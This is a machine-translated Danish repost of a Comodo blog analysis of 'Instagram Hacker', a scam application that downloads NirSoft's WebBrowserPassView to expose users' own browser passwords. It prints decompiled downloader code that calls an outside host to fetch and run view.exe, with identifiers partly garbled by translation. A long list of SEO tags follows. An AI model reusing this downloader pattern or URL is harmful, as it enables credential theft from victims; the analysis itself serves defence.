Læsetid: 4 minutter
Mange mennesker tager ikke potentielt uønskede applikationer (PUA) som en alvorlig fare. Årsagen til en sådan hensynsløs holdning er, at PUA normalt installeres med brugerens samtykke. Men denne udtalelse er en stor fejltagelse. Og ikke kun fordi en PUA skjult kan installere andre programmer som adware eller spyware på en drive-by download basis. Det levende eksempel nedenfor analyseret af Comodo Threat Research Labs eksperter viser tydeligt, at en PUA kan være et meget mere truende våben.
Mød softwaren med navnet "Instagram Hacker". Det har den officielle hjemmeside https://hackinstagram.net/ og lover … at hacke enhver Instagram-konto. Mere af det, du kan downloade og installere det gratis.
Efter installationen beder den om at indtaste en Instagram-profil-URL og hacke adgangskoden.
Resultatet kommer i løbet af få sekunder:
Men efter at have klikket på knappen "Se adgangskode", vises et nyt vindue:
Ved at klikke på knappen "Få en aktiveringskode" omdirigeres til "Køb-siden".
Det tilbyder at købe "Aktiveringskode", men ... kan du lugte en svindel i luften? Det er indlysende, ingen software, der er i stand til at bryde en Instagram-adgangskode i sekunder, kan eksistere. Så er Instagram Hacker bare endnu et bedragerisk værktøj til at dupere simpletoner? Den bedste måde at kontrollere det på er at se inde i applikationskoden.
Koden er beskyttet med Dotnet Reactor, men kan afkodes med de4dot-værktøjet.
Og nu kan vi med sikkerhed se, at applikationen er et svindelværktøj. Det første fragment af kode forfalsker bare fremskridtsdemonstrationsindikator.
Men en anden er mere interessant. Som du kan se, indeholder den en URL med en eksekverbar fil, der kan downloades, hvis aktiveringen lykkedes.
LoadingWindow()
{
Class2.qDiUy7EzyuIMj();
this.filename = "view.exe";
this.uri = new Uri(“http://software-logistics.net/external/component/download/view.exe”);
this.InitializeComponent();
if (File.Exists(this.filename))
{
File.Delete(dette.filnavn);
}
prøv
{
WebClient client1 = new WebClient();
client1.DownloadFileAsync(this.uri, this.filename);
client1.DownloadProgressChanged += ny DownloadProgressChangedEventHandler(this.method_1);
client1.DownloadFileCompleted += new AsyncCompletedEventHandler(this.method_2);
}
fangst
{
denne.metode_0();
}
}
}
}
Hvis vi kører den eksekverbare, vil vi finde ud af, at det er WebBrowserPassView-applikationen fra NirSoft:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView er blot et adgangskodeekstraktionsværktøj, der afslører de adgangskoder, der er gemt af webbrowsere. Så alle adgangskoder denne software kan udtrække er ikke Instagrams, men brugernes egne adgangskoder opbevaret i deres browsere!
Lad os genoptage: alt, hvad Instagram Hacker gør, er at downloade og lancere endnu en PUA fra NirSoft. Så vi står naturligvis over for et svindelværktøj. Læg mærke til det manipulerende psykologiske trick her: Hvis et offer opdager, at hun blev snydt, melder hun næppe politiet om hændelsen. For i så fald ville hun være nødt til at tilstå i forsøget på at hacke Instagram, det er en handling, der begår en cyberkriminalitet.
Men det er en tynd ende af kanten.
Den farligste trussel er, at URL'en i applikationen nemt kan ændres på enhver anden med en ondsindet fil, der vil blive eksekveret på et offers maskine. Så denne PUA - såvel som mange andre eksempler på en sådan malware-type - kan bruges til massiv spredning af forskellige "tunge" malware som trojanske heste, bagdøre, ransomware etc.
Og dette er en god grund til at tage PUA som virkelig farlig malware. For det kan vise sig at være et springbræt til et ødelæggende massivt cyberangreb.
"I dag skal vi ikke overveje malware som farlige eller knap så farlige,” siger Fatih Orhan, lederen af Comodo Threat Research Labs. "Nogen malware eksisterer ikke i et isoleret rum. I dag bygger cyberkriminelle lange malware-kæder for at angribe brugere, og som du kan se, kan PUA være et led i sådan en drabskæde. Så vi burde kalde spade for en spade. Ja, disse applikationer downloades og køres med brugernes godkendelse, men som i dette tilfælde afpresses godkendelsen af svindel. Gennem potentielt uønskede applikationer, der foregiver at være legitime, skal alle forstå, at det bare er en camouflage. Derfor giver Comodo ikke kun avanceret teknisk beskyttelse, men informerer regelmæssigt brugerne for at forhindre dem i farlige fælder i cyberspace”.
Lev sikkert med Comodo!
Relaterede ressourcer
Wikipedia DDOS-angreb
Fjernelse af malware
Malware-scanner på webstedet
Bedste webstedssikkerhed
WordPress Sikkerhed
START GRATIS PRØVNING FÅ DIT ØJEBLIKKE SIKKERHEDSSCORECARD GRATIS
- SEO Powered Content & PR Distribution. Bliv forstærket i dag.
- Platoblokkæde. Web3 Metaverse Intelligence. Viden forstærket. Adgang her.
- Kilde: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- a
- I stand
- Om
- Konto
- Lov
- Aktivering
- Efter
- LUFT
- Alle
- ,
- En anden
- Anvendelse
- applikationer
- godkendelse
- angribe
- holdning
- Bagdøre
- grundlag
- fordi
- BEDSTE
- Big
- Blog
- Pause
- browsere
- bygge
- .
- købe
- ringe
- tilfælde
- kæde
- kæder
- kontrollere
- tydeligt
- kode
- begå
- samtykke
- Overvej
- indeholder
- Cyber angreb
- cyberkriminalitet
- cyberkriminelle
- FARE
- Dangerous
- DDoS
- ødelæggende
- opdager
- Dont
- fordoble
- downloade
- nemt
- Edge
- Indtast
- etc.
- begivenhed
- eksempel
- eksempler
- eksperter
- ekstrakt
- Ansigtet
- få
- File (Felt)
- Finde
- Fornavn
- bedrageri
- Gratis
- fra
- få
- godt
- større
- hack
- hacker
- hoved
- link.
- Hvordan
- How To
- HTML
- HTTPS
- in
- hændelse
- Indikator
- installere
- øjeblikkelig
- interessant
- isolerede
- IT
- Labs
- lancering
- LINK
- Lang
- Se
- maskine
- malware
- Malware-angreb
- mange
- massive
- max-bredde
- fejltagelse
- mere
- mest
- Som hedder
- behov
- Ny
- Obvious
- Tilbud
- officiel
- Officiel hjemmeside
- ONE
- Udtalelse
- Andet
- egen
- Adgangskode
- Nulstilling/ændring af adgangskoder
- Mennesker
- PHP
- plato
- Platon Data Intelligence
- PlatoData
- Police
- potentielt
- forhindre
- Profil
- Programmer
- Progress
- Promises
- beskyttet
- beskyttelse
- give
- indse
- grund
- hensynsløs
- regelmæssigt
- Rapporter
- forskning
- resultere
- Genoptag
- afslører
- Rid
- Kør
- scorecard
- sekunder
- sikker
- sikkerhed
- alvorlig
- bør
- So
- Software
- Space
- spyware
- opbevaret
- vellykket
- sådan
- Tag
- Teknisk
- deres
- trussel
- hele
- tid
- til
- værktøj
- fælder
- TUR
- forstå
- uønsket
- URL
- Bruger
- brugere
- sædvanligvis
- forskellige
- Victim
- Specifikation
- web
- Webbrowsere
- Hjemmeside
- vilje
- ville
- Du
- Din
- zephyrnet